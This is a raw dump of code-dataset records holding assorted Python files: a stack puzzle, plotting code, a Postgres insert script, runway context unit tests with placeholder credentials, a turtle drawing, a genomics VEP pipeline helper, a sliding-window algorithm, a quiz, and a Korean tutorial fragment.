= []\r\n index = self.__top\r\n while (index >= 0):\r\n msg.append((str)(self.__elements[index]))\r\n index -= 1\r\n msg = \" \".join(msg)\r\n msg = \"Stack data(Top to Bottom): \" + msg\r\n return msg\r\n\r\ndef fun(input_stack):\r\n num = input_stack.get_max_size() -1\r\n num1 = 1\r\n while (num > 0):\r\n top_element = input_stack.pop()\r\n temp_stack = Stack(input_stack.get_max_size())\r\n num2 = 1\r\n while (num2 <= num1):\r\n element = input_stack.pop()\r\n temp_stack.push(element + top_element)\r\n num2 += 1\r\n while (temp_stack.is_empty() is False):\r\n input_stack.push(temp_stack.pop())\r\n input_stack.push(top_element)\r\n num1 += 1\r\n num -= 1\r\n return input_stack\r\n\r\n\r\nsample = Stack(5)\r\nsample.push(8)\r\nsample.push(2)\r\nsample.push(6)\r\nsample.push(7)\r\nsample.push(10)\r\nresult_stack = fun(sample)\r\nresult_stack.display()\r\n\r\n\r\n","sub_path":"figure_out_how.py","file_name":"figure_out_how.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541130386","text":"class DataAnalysis(object):\n\n\tdef __init__(self,inputDataFrame):\n\n\t\tself.inputDataFrame = inputDataFrame\n\n\t\treturn None\n\n\tdef plotReturns(self,StockNum,RetNum):\n\n\t\t'''\n\t\tInput: StockNum - which stock to plot\n\t\t\t RetNum - how many returns to plot\n\t\tOutput: Figure with desired returns\n\n\t\t'''\n\n\t\t# plot the current day D returns\n\n\t\timport matplotlib.pyplot as plt\n\n\t\tdataField = self.inputDataFrame[self.inputDataFrame['Id']==StockNum]\n\n\t\t# select the returns to plot\n\n\t\tplotRet = []\n\n\t\tfor j in xrange(2,RetNum):\n\n\t\t\tRetString = 'Ret_' + str(j)\n\n\t\t\tplotRet.append(dataField[RetString])\n\n\t\tplt.figure()\n\t\tplt.title('%s Returns of %s Stock'%(RetNum,StockNum))\n\t\tplt.plot(plotRet,'r')\n\t\tplt.show()\n\n\t\treturn 'The figure was plotted!'","sub_path":"DataAnalysis.py","file_name":"DataAnalysis.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"413526819","text":"import json \nimport os \nimport psycopg2\nimport psycopg2.extras\n\n\nimport json\nimport psycopg2\n\nconn = psycopg2.connect(\n host = os.getenv(\"FRINX_HOST\", \"localhost\"),\n database = os.getenv(\"FRINX_DATABASE\", \"postgres\"),\n user= os.getenv(\"FRINX_USER\", \"postgres\"),\n password=os.getenv(\"FRINX_PASSWORD\", \"tutorial\")\n )\ncursor=conn.cursor\ndata = []\nwith open('data.json') as f:\n for line in f:\n data.append(json.loads(line))\n\nfields = [\n \"id\" #SERIAL PRIMARY KEY,\n \"connection\" #INTEGER,\n \"name\" #VARCHAR(255) NOT NULL,\n \"description\" #VARCHAR(255),\n \"config\" #json,\n \"type\" #VARCHAR(50),\n \"infra_type\" #VARCHAR(50),\n \"port_channel_id\" #INTEGER,\n \"max_frame_size\" #INTEGER\n\n]\nfor item in data:\n my_data = [item[field] for field in fields]\n for i, v in enumerate(my_data):\n if isinstance(v, dict):\n my_data[i] = json.dumps(v)\n insert_query = \"INSERT INTO crm VALUES (%s, %s, %s, %s)\"\n cursor.execute(insert_query, tuple(my_data))\nconn.close\ncursor.close","sub_path":"frinx.py","file_name":"frinx.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"203669498","text":"\"\"\"Tests for context module.\"\"\"\n# pylint: disable=protected-access,no-self-use\nimport logging\n\nfrom mock import patch\n\nfrom runway.context import Context\n\nLOGGER = logging.getLogger('runway')\n\nTEST_CREDENTIALS = {\n 'AWS_ACCESS_KEY_ID': 'foo',\n 'AWS_SECRET_ACCESS_KEY': 'bar',\n 'AWS_SESSION_TOKEN': 'foobar'\n}\n\n\nclass TestContext(object):\n \"\"\"Test Context class.\"\"\"\n\n def test_boto3_credentials(self):\n \"\"\"Test boto3_credentials.\"\"\"\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars=TEST_CREDENTIALS.copy())\n\n assert context.boto3_credentials == {key.lower(): value\n for key, value in\n TEST_CREDENTIALS.items()}\n\n def test_current_aws_creds(self):\n \"\"\"Test current_aws_creds.\"\"\"\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars=TEST_CREDENTIALS.copy())\n\n assert context.current_aws_creds == TEST_CREDENTIALS\n\n def test_is_interactive(self):\n \"\"\"Test is_interactive.\"\"\"\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'NON_EMPTY': '1'})\n assert context.is_interactive\n\n context.env_vars['CI'] = '1'\n assert not context.is_interactive\n\n def test_is_noninteractive(self):\n \"\"\"Test is_noninteractive.\"\"\"\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'NON_EMPTY': '1'})\n assert not context.is_noninteractive\n\n context.env_vars['CI'] = '1'\n assert context.is_noninteractive\n\n def test_is_python3(self):\n \"\"\"Test is_python3.\"\"\"\n from runway.context import sys\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./')\n\n with patch.object(sys, 'version_info') as version_info:\n version_info.major = 2\n assert not context.is_python3\n\n with patch.object(sys, 'version_info') as version_info:\n version_info.major = 3\n assert context.is_python3\n\n def test_max_concurrent_cfngin_stacks(self):\n \"\"\"Test max_concurrent_cfngin_stacks.\"\"\"\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./')\n assert context.max_concurrent_cfngin_stacks == 0\n\n context.env_vars['RUNWAY_MAX_CONCURRENT_CFNGIN_STACKS'] = '1'\n assert context.max_concurrent_cfngin_stacks == 1\n\n def test_max_concurrent_modules(self):\n \"\"\"Test max_concurrent_modules.\"\"\"\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'RUNWAY_MAX_CONCURRENT_MODULES': '1'})\n assert context.max_concurrent_modules == 1\n\n del context.env_vars['RUNWAY_MAX_CONCURRENT_MODULES']\n\n with patch('runway.context.multiprocessing.cpu_count') as cpu_count:\n cpu_count.return_value = 8\n assert context.max_concurrent_modules == 8\n\n def test_max_concurrent_regions(self):\n \"\"\"Test max_concurrent_regions.\"\"\"\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'RUNWAY_MAX_CONCURRENT_REGIONS': '1'})\n assert context.max_concurrent_regions == 1\n\n del context.env_vars['RUNWAY_MAX_CONCURRENT_REGIONS']\n\n with patch('runway.context.multiprocessing.cpu_count') as cpu_count:\n cpu_count.return_value = 8\n assert context.max_concurrent_regions == 8\n\n def test_use_concurrent(self):\n \"\"\"Test use_concurrent.\"\"\"\n from runway.context import sys\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'NON_EMPTY': '1'})\n context_ci = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'CI': '1'})\n\n with patch.object(sys, 'version_info') as version_info:\n version_info.major = 2\n assert not context.use_concurrent\n assert not context_ci.use_concurrent\n\n with patch.object(sys, 'version_info') as version_info:\n version_info.major = 3\n assert not context.use_concurrent\n assert context_ci.use_concurrent\n\n def test_init_name_from_arg(self):\n \"\"\"_env_name_from_env should be false when DEPLOY_ENVIRONMENT not set.\"\"\"\n context = Context(env_name='test', env_region='us-east-1',\n env_root='./')\n assert context.env_name == 'test'\n assert context.env_vars['DEPLOY_ENVIRONMENT'] == context.env_name, \\\n 'env_vars.DEPLOY_ENVIRONMENT should be set from env_name'\n assert not context._env_name_from_env, \\\n 'should be false when env_name was not derived from env_var'\n\n def test_init_from_envvar(self):\n \"\"\"_env_name_from_env should be true when DEPLOY_ENVIRONMENT is set.\"\"\"\n context = Context(env_name='test', env_region='us-east-1',\n env_root='./', env_vars={'DEPLOY_ENVIRONMENT': 'test'})\n assert context.env_name == 'test'\n assert context.env_vars['DEPLOY_ENVIRONMENT'] == context.env_name, \\\n 'env_vars.DEPLOY_ENVIRONMENT should be set from env_name'\n assert context._env_name_from_env, \\\n 'should be true when env_name was not derived from env_var'\n\n def test_echo_detected_environment_not_env(self, caplog):\n \"\"\"Environment helper note when DEPLOY_ENVIRONMENT is not set.\"\"\"\n context = Context(env_name='test', env_region='us-east-1',\n env_root='./')\n expected = ['',\n 'Environment \"test\" was determined from the '\n 'current git branch or parent directory.',\n 'If this is not the environment name, update '\n 'the branch/folder name or set an override value via the '\n 'DEPLOY_ENVIRONMENT environment variable',\n '']\n\n with caplog.at_level(logging.INFO):\n context.echo_detected_environment()\n\n assert [rec.message for rec in caplog.records] == expected\n\n def test_echo_detected_environment_from_env(self, caplog):\n \"\"\"Environment helper note when DEPLOY_ENVIRONMENT is set.\"\"\"\n context = Context(env_name='test', env_region='us-east-1',\n env_root='./', env_vars={'DEPLOY_ENVIRONMENT': 'test'})\n expected = ['',\n 'Environment \"test\" was determined from the '\n 'DEPLOY_ENVIRONMENT environment variable.',\n 'If this is not correct, update the value (or '\n 'unset it to fall back to the name of the current git '\n 'branch or parent directory).',\n '']\n\n with caplog.at_level(logging.INFO):\n context.echo_detected_environment()\n\n assert [rec.message for rec in caplog.records] == expected\n\n def test_save_existing_iam_env_vars(self):\n \"\"\"Test save_existing_iam_env_vars.\"\"\"\n context = Context(env_name='dev', env_region='us-east-1',\n env_root='./', env_vars=TEST_CREDENTIALS.copy())\n context.save_existing_iam_env_vars()\n assert context.env_vars['OLD_AWS_ACCESS_KEY_ID'] == 'foo'\n assert context.env_vars['OLD_AWS_SECRET_ACCESS_KEY'] == 'bar'\n assert context.env_vars['OLD_AWS_SESSION_TOKEN'] == 'foobar'\n","sub_path":"tests/test_context.py","file_name":"test_context.py","file_ext":"py","file_size_in_byte":8135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"118831717","text":"import turtle\n\nwn = turtle.Screen() # create a screen\nwn.bgcolor(\"yellow\") # set the screen background color\ny = turtle.Turtle() # create a turtle object\ny.shape(\"turtle\") # define the shape of the obj\ny.speed(3) # speed of animation (if 0 then maximum speed)\ndist = 10\ny.up() # penup, this will avoid the trace formation\nfor x in range(200): # for loop for helix\n y.forward(dist)\n y.left(90)\n y.stamp() # a stamp of the selected shape will be made at this point\n dist += 10\n\nturtle.done() # required in pycharm for turtle screen formation\n","sub_path":"src/myfirstprogram.py","file_name":"myfirstprogram.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"70274490","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# mv.py\n# made by Min-Seok Kwon\n# 2019-12-29 17:37:50\n#########################\nimport time\nimport sys\nimport os\nSVRNAME = os.uname()[1]\nif \"MBI\" in SVRNAME.upper():\n sys_path = \"/Users/pcaso/bin/python_lib\"\nelif SVRNAME == \"T7\":\n sys_path = \"/ms1/bin/python_lib\"\nelse:\n sys_path = \"/home/mk446/bin/python_lib\"\nsys.path.append(sys_path)\n\n\ndef run():\n for d1 in file_util.listdir('./'):\n if 'chr' in d1:\n for d2 in file_util.listdir('./' + d1):\n # print(d1 + '/' + d2)\n cmd = \"python \" + path + \"mv.py \" + d1 + '/' + d2\n print(cmd)\n # for fname in file_util.listdir('./' + d1 + '/' + d2, '.vep.sh'):\n # f1 = path + d1 + '/' + d2 + '/' + fname\n # # print(f1)\n # cmd = \"mv \" + f1 + ' ' + f1.replace('.vep.sh', '.vep.txt')\n # # print(cmd)\n # proc_util.run_cmd(cmd)\n # break\n # break\n\n\ndef mv(d1):\n for fname in file_util.listdir(path + d1, '.vcf'):\n f1 = path + d1 + '/' + fname\n # print(f1)\n vcf = path + d1 + '/' + fname\n vep = path + d1 + '/' + fname + '.vep.txt'\n cmd = \"mv \" + f1 + ' ' + f1.replace('.vep.sh', '.vep.txt')\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py precal -check_vep_result -vcf \" + vcf + \" -vep_result \" + vep\n # print(cmd)\n print(proc_util.run_cmd(cmd, True))\n\n\ndef s11_check_undone(d1):\n vcflist = []\n for fname in file_util.listdir(path + d1, '.vcf'):\n vcf = path + d1 + '/' + fname\n if not file_util.is_exist(vcf + '.vep.txt.checked'):\n cnt = 0\n for line in open(vcf):\n if line[0] != '#':\n cnt += 1\n if cnt > 0:\n vcflist.append(vcf)\n out = path + 'checked_' + d1.replace('/', '_')\n file_util.fileSave(out, '\\n'.join(vcflist), 'w')\n\n\ndef s12_merge_checked():\n for fname in file_util.listdir('./'):\n if 'checked_chr' in fname:\n # print(fname)\n if file_util.getFileSize(fname) > 0:\n flist = file_util.fileOpen(fname).split('\\n')\n cmd = \"\"\n for inputvcf in flist:\n out = inputvcf + '.vep.txt'\n cmd += \"/home/mk446/bin/vep -i \" + inputvcf + \" -o \" + out + \" --hgvs \"\n cmd += \"--fasta \" + fasta + \" --assembly GRCh38 --use_given_ref \"\n cmd += \"--offline --cache_version 98 --dir_cache \" + vepcache + \" \"\n cmd += \"--plugin MaxEntScan,/home/mk446/bio/mutanno/ANNOT3TOOLS/BIN/VEP_plugins-release-98/MaxEntScan/fordownload \"\n cmd += \"--plugin TSSDistance \"\n cmd += \"--everything --force_overwrite --tab;\\n\"\n print(cmd.strip())\n\n\ndef s13_getvcflist(d1):\n vcflist = []\n for fname in file_util.listdir(path + d1, '.vcf'):\n vcf = d1 + '/' + fname\n vcflist.append(vcf)\n out = path + 'vcf_' + d1.replace('/', '_')\n file_util.fileSave(out, '\\n'.join(vcflist) + '\\n', 'w')\n\n\ndef s14_merge_vcflist():\n for chrom in seq_util.MAIN_CHROM_LIST:\n # print(chrom)\n if chrom == \"MT\":\n chrom = \"M\"\n for k in range(1000):\n listfile = \"./vcflist/vcf_chr\" + chrom + \"_\" + str(k)\n if file_util.is_exist(listfile):\n if k == 0:\n cmd = \"cat \" + listfile + \" > vcflist_chr\" + chrom\n else:\n cmd = \"cat \" + listfile + \" >> vcflist_chr\" + chrom\n print(cmd)\n\n proc_util.run_cmd(cmd)\n\n\ndef s15_check_rerun():\n for line in open('r.sh'):\n arr = line.split(' ')\n vcf = arr[2]\n vep = arr[4]\n if not file_util.is_exist(vep):\n # print(vcf)\n cntvar = 0\n header = ''\n for line in open(vcf):\n if line[0] != '#':\n arr = line.split('\\t')\n if arr[3].strip() != '':\n cntvar += 1\n else:\n header = line\n # print(header)\n if cntvar == 0:\n # print(vcf)\n # file_util.fileSave(vep + '.checked', '', 'w')\n # file_util.fileSave(vcf, header, 'w')\n pass\n else:\n if file_util.is_exist(vep + '.error'):\n # print(vcf)\n cmd = \"rm \" + vep + '.error'\n # print(proc_util.run_cmd(cmd))\n\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py precal -check_vep_result -vcf \" + vcf + \" -vep_result \" + vep\n # print(cmd)\n # print(proc_util.run_cmd(cmd))\n\n cmd = \"/home/mk446/bin/vep -i \" + vcf + \" -o \" + vep + \" --hgvs \"\n cmd += \"--fasta \" + fasta + \" --assembly GRCh38 --use_given_ref \"\n cmd += \"--offline --cache_version 98 --dir_cache \" + vepcache + \" \"\n cmd += \"--plugin MaxEntScan,/home/mk446/bio/mutanno/ANNOT3TOOLS/BIN/VEP_plugins-release-98/MaxEntScan/fordownload \"\n cmd += \"--plugin TSSDistance \"\n cmd += \"--everything --force_overwrite --tab;\"\n print(cmd)\n pass\n else:\n # print(vcf)\n pass\n\n\ndef s16_vcfgz():\n for line in file_util.gzopen(\"vcflist.gz\"):\n line = line.decode('UTF-8')\n # cmd = \"tabixgz \" + path + line.strip()\n vcf = path + line.strip()\n vep = vcf + '.vep.txt'\n # if file_util.is_exist(vcf) and file_util.is_exist(vcf+'.gz') and file_util.is_exist(vcf+'.gz.tbi'):\n # cmd = \"rm \" + vcf\n # # cmd = \"rm \" + path + line.strip() + \".vep.sh_summary.html\"\n # print(cmd)\n # proc_util.run_cmd(cmd)\n\n if file_util.is_exist(vep) and file_util.is_exist(vep + '.checked') and file_util.is_exist(vep + '.done'):\n cmd = \"gz \" + vep\n print(cmd)\n\n\ndef s17_vep2tab():\n for line in file_util.gzopen(\"vcflist.gz\"):\n line = line.decode('UTF-8')\n vcf = path + line.strip()\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n # if file_util.is_exist(vep):\n if True:\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py convert -vep2tab\"\n cmd += \" -in \" + vep + '.gz'\n cmd += \" -out \" + tab\n cmd += \";\\n\"\n # cmd += \"tabixgz \" + tab + \";\"\n print(cmd)\n # break\n\n\ndef s18_gz(d1):\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + '/' + fname\n vep = vcf + '.vep.txt'\n # if file_util.is_exist(vcf):\n # cmd = \"tabixgz \" + vcf\n # proc_util.run_cmd(cmd)\n # print(cmd)\n\n # vep = path + d1 + '/' + fname\n # if file_util.is_exist(vep) and file_util.is_exist(vep + '.checked') and file_util.is_exist(vep + '.done'):\n # cmd = \"gz \" + vep\n # proc_util.run_cmd(cmd)\n # print(cmd)\n # tab = vep.replace('.vep.txt', '.vep.tab')\n tab = vcf + '.vep.tab'\n if file_util.is_exist(tab):\n cmd = \"tabixgz \" + tab\n proc_util.run_cmd(cmd)\n print(cmd)\n print('sleep 60')\n time.sleep(60)\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + '/' + fname\n # vep = path + d1 + '/' + fname\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n if file_util.is_exist(vcf) and file_util.is_exist(vcf + '.gz') and file_util.is_exist(vcf + '.gz.tbi'):\n cmd = \"rm \" + vcf\n proc_util.run_cmd(cmd)\n print(cmd)\n # tab = vep.replace('.vep.txt', '.vep.tab')\n # if file_util.is_exist(vep) and file_util.is_exist(vep+'.gz') and file_util.is_exist(vep + '.checked') and file_util.is_exist(vep + '.done'):\n # cmd = \"rm \" + vep\n # proc_util.run_cmd(cmd)\n # print(cmd)\n if file_util.is_exist(tab) and file_util.is_exist(tab + '.gz') and file_util.is_exist(tab + '.gz.tbi'):\n cmd = \"rm \" + tab\n proc_util.run_cmd(cmd)\n print(cmd)\n\n\ndef s19_vep2tab(d1):\n flag_sleep = False\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n # print(vep + \".gz\")\n if file_util.is_exist(vep + \".gz\") and not (file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\")):\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py convert -vep2tab\"\n cmd += \" -in \" + vep + '.gz'\n cmd += \" -out \" + tab\n cmd += \";\\n\"\n # cmd += \"tabixgz \" + tab + \";\"\n print(cmd)\n proc_util.run_cmd(cmd)\n flag_sleep = True\n if flag_sleep:\n print('sleep 60')\n time.sleep(60)\n flag_sleep = False\n\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n if file_util.is_exist(tab) and not (file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\")):\n cmd = \"tabixgz \" + tab + \";\"\n print(cmd)\n proc_util.run_cmd(cmd)\n flag_sleep = True\n if flag_sleep:\n print('sleep 60')\n time.sleep(60)\n\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n if file_util.is_exist(tab) and file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\"):\n cmd = \"rm \" + tab + ''\n print(cmd)\n proc_util.run_cmd(cmd)\n\n\ndef s20_check_veptabgz(d1):\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n tab = vcf + '.vep.tab'\n if file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\"):\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py precal -check_vep_result \"\n cmd += \"-vcf \" + vcf + \".gz \"\n cmd += \"-vep_result \" + tab + \".gz \"\n print(cmd)\n print(proc_util.run_cmd(cmd))\n # break\n else:\n cntvar = 0\n for line in file_util.gzopen(vcf + '.gz'):\n line = line.decode('UTF-8')\n if line[0] != '#':\n cntvar += 1\n if cntvar == 0:\n cmd = \"rm \" + vcf + \"*\"\n print(cmd)\n proc_util.run_cmd(cmd)\n else:\n pass\n # print(cmd)\n # print(tab)\n\n\ndef s21_check_veptabgz2(d1):\n out = path + d1.replace('/', '_') + \".log.sh\"\n # file_util.fileSave(out, '', 'w')\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n tab = vcf + '.vep.tab'\n vep = vcf + '.vep.txt'\n if file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\") and file_util.is_exist(tab + \".gz.checked\"):\n pass\n else:\n cmd = \"rm \" + vcf + \".vep*;\"\n\n cmd += \"/home/mk446/bin/vep -i \" + vcf + \".gz -o \" + vep + \" --hgvs \"\n cmd += \"--fasta \" + fasta + \" --assembly GRCh38 --use_given_ref \"\n cmd += \"--offline --cache_version 98 --dir_cache \" + vepcache + \" \"\n cmd += \"--plugin MaxEntScan,/home/mk446/bio/mutanno/ANNOT3TOOLS/BIN/VEP_plugins-release-98/MaxEntScan/fordownload \"\n cmd += \"--plugin TSSDistance \"\n cmd += \"--everything --force_overwrite --tab;\"\n cmd += \"sleep 5;\"\n\n cmd += mutanno + \"convert -vep2tab -in \" + vep + \" -out \" + tab + \";\"\n # proc_util.run_cmd(cmd, True)\n # file_util.fileSave(out, vcf + '\\n', 'a')\n cmd += \"sleep 5;\"\n cmd += \"tabixgz \" + tab + \";\"\n cmd += \"sleep 5;\"\n cmd += mutanno + \"precal -check_vep_result -vep_result \" + tab + \".gz -vcf \" + vcf + \".gz;\"\n cmd += \"sleep 5;\"\n file_util.fileSave(out, cmd + '\\n', 'a')\n\n\ndef s22_rm_emptyvcf(d1):\n out = path + d1.replace('/', '_') + '.log.sh'\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n cnt = 0\n for line in file_util.gzopen(path + d1 + '/' + fname):\n line = line.decode('UTF-8')\n if line[0] != \"#\":\n cnt += 1\n if cnt > 2:\n break\n if cnt == 0:\n cmd = \"rm \" + path + d1 + '/' + fname[:-3] + '*;\\n'\n # print(cmd)\n file_util.fileSave(out, cmd, 'a')\n\n\ndef s23_merge_chrom(chrom):\n out = path + \"vep.hg38.\" + chrom + \".tsv\"\n # f = open(out, 'w')\n i = 0\n for k in range(300):\n vcfmap = {}\n for vcf in file_util.walk(path + \"chr\" + chrom + \"/\" + str(k) + \"/\", '.vcf.gz'):\n # print(vcf)\n k1 = int(vcf.split('/')[-1].split('_')[1])\n vcfmap[vcf] = k1\n # print(vcfmap)\n (ks, vs) = struct_util.sortdict(vcfmap)\n # print(ks)\n # print(vs)\n for vcf in ks:\n vep = vcf[:-3] + \".vep.tab.gz\"\n if i == 0:\n cmd = \"zcat \" + vep + \" > \" + out\n else:\n cmd = \"zcat \" + vep + \" | grep -v '^#' >> \" + out\n print(cmd)\n i += 1\n # break\n # f.close()\n cmd = \"sleep 20;\"\n print(cmd)\n cmd = \"tabixgz \" + out\n print(cmd)\n\n\ndef run_chrom():\n for chrom in seq_util.MAIN_CHROM_LIST:\n if chrom == \"MT\":\n chrom = \"M\"\n out = path + \"merge_\" + chrom + \".sh\"\n cmd = \"python \" + path + \"mv.py \" + chrom + \" > \" + out + \";\"\n cmd += \"sleep 20;\"\n cmd += \"mv \"+out+\" /home/mk446/jobs/.;\"\n print(cmd)\n\n\ndef s24_rm_intermediate_files(d1):\n out = path + d1.replace('/', '_') + '.log.sh'\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + '/' + fname[:-3]\n cmd = \"rm \" + vcf + \".vep.sh_summary.html;\"\n cmd += \"rm \" + vcf + \".vep.tab.gz.checked;\"\n cmd += \"rm \" + vcf + \".vep.txt.checked;\"\n cmd += \"rm \" + vcf + \".vep.txt.done;\"\n cmd += \"rm \" + vcf + \".vep.txt.gz;\"\n proc_util.run_cmd(cmd, True)\n\n\nif __name__ == \"__main__\":\n import proc_util\n import file_util\n import seq_util\n import struct_util\n fasta = \"/n/data1/hms/dbmi/park/SOFTWARE/REFERENCE/GRCh38d1/GRCh38_full_analysis_set_plus_decoy_hla.fa\"\n vepcache = \"/home/mk446/bio/mutanno/ANNOT3TOOLS/BIN/nonindexed_vep_cache/homo_sapiens_merged\"\n path = \"/home/mk446/mutanno/PRECALVEP/\"\n mutanno = \"python /home/mk446/mutanno/SRC/mutanno.py \"\n # run()\n # mv(sys.argv[1])\n # s11_check_undone(sys.argv[1])\n # s12_merge_checked()\n # s13_getvcflist(sys.argv[1])\n # s14_merge_vcflist()\n # s15_check_rerun()\n # s16_vcfgz()\n # s17_vep2tab()\n # s18_gz(sys.argv[1])\n # s19_vep2tab(sys.argv[1])\n # s20_check_veptabgz(sys.argv[1])\n # s21_check_veptabgz2(sys.argv[1])\n # s22_rm_emptyvcf(sys.argv[1])\n s23_merge_chrom(sys.argv[1])\n # run_chrom()\n # s24_rm_intermediate_files(sys.argv[1])\n","sub_path":"scripts/vep/mv2.py","file_name":"mv2.py","file_ext":"py","file_size_in_byte":15484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"409204778","text":"'''\n=> Sliding Window\nTime:O(n + m)\nSpace: O(m)\n'''\nclass Solution:\n \"\"\"\n @param source : A string\n @param target: A string\n @return: A string denote the minimum window, return \"\" if there is no such a string\n \"\"\"\n def minWindow(self, source , target):\n # write your code here\n if not source or not target:\n return ''\n \n unique_chars = len(set(target))\n target_chars_map = self.get_chars_map(target)\n \n right = 0\n unique_count = 0\n chars_map = {}\n res = []\n for left in range(len(source)):\n while right < len(source) and unique_count < unique_chars:\n if source[right] in target_chars_map:\n chars_map[source[right]] = chars_map.get(source[right], 0) + 1\n if chars_map[source[right]] == target_chars_map[source[right]]:\n unique_count += 1\n right += 1\n if unique_count == unique_chars:\n if not res or res[1] - res[0] > right - left:\n res = [left, right]\n if source[left] in target_chars_map:\n chars_map[source[left]] -= 1\n if chars_map[source[left]] < target_chars_map[source[left]]:\n unique_count -= 1\n \n return '' if not res else source[res[0]: res[1]]\n \n def get_chars_map(self, target):\n chars_map = {}\n \n for char in target:\n chars_map[char] = chars_map.get(char, 0) + 1\n \n return chars_map","sub_path":"32_minimum-window-substring/minimum-window-substring.py","file_name":"minimum-window-substring.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"388480823","text":"# Chapter 03 Laboratory\n# Course: Program Arcade Games with Python\n# Author: Leo Dube\n# Date: April 09, 2016\n\n# Quiz parameters\nquestions_tot = 3 # Total number of questions\nquestions_cor = 0 # Tracks correct answers\n\n# Quiz\n\n# Question 1\nans_1 = int(input(\"What is 3 * 3? > \"))\nif ans_1 == 9:\n print(\"Correct!\")\n questions_cor += 1\nelse:\n print(\"Incorrect\")\n\n# Question 2\nans_2 = input(\"\\nWhat is the derivative of x^2? > \")\nif ans_2 == \"2x\" or ans_2 == \"2*x\" or ans_2 == \"2 * x\":\n print(\"Correct!\")\n questions_cor += 1\nelse:\n print(\"Incorrect\")\n\n# Question 3\nans_3 = input(\"\\nWhat is Canada's PM's last name? > \")\nif ans_3.lower() == \"trudeau\":\n print(\"Correct!\")\n questions_cor += 1\nelse:\n print(\"Incorrect\")\n\nprint()\n\n# Recap\npercent = (questions_cor / questions_tot) * 100\n\nif percent >= 60:\n print(\"Congrats, you got \", percent, \" percent!\")\nelse:\n print(\"Sorry, you only got \", percent, \" percent.\")\n","sub_path":"lab03.py","file_name":"lab03.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"416142453","text":"# 이제 다시 파이썬으로 돌아와서,\n# 배열과 집합, 파일 읽고 쓰기를 (다시) 공부해보도록 하겠습니다.\n\n\n\n# 1. 파이썬 리스트(배열), 셋(집합) 다루는 법\n\n# 중복요소를 제거\narr1 = ['LTE', 'LTE', '5G', '5G', 'WCDMA', '5G', 'WCDMA', 'LTE']\narr2 = [1, 1, 2, 2, 3, 2, 3, 3]\nset1 = set(arr1)\nset2 = set(arr2)\narr1 = list(set1)\narr2 = list(set2)\nprint(arr1)\nprint(arr2)\n\n# 요소의 추가 : arr는 arr.append(el), set은 set.add(el)로 추가\n\n# 요소의 삭제 : discard (el) 없는데 빼면 무시, remove (el) 없는데 빼면 에러, pop () : 마지막 요소를 리턴 후 뺌, clear () : 전부 뺌\n# pop()의 동작\nprint(arr2.pop()) # \"마지막 요소를 리턴\" 확인\nprint(arr2) # \"마지막 요소를 뺌\" 확인\n\n\n\n# 2. 파일 읽고 쓰는 법\n\n# 파일은 open() 함수를 사용하여,\n# \"파일객체 = open(파일이름, 파일열기모드)\" 와 같은 형식으로 접근합니다. *예시에서 파일객체 이름은 f로 하겠습니다.\n# 파일 열기모드는 읽기모드(r), 쓰기모드(w), 추가모드(a)가 있습니다.\n# 파일 쓰기는 f.write(문자열)로 이뤄지니다.\n# 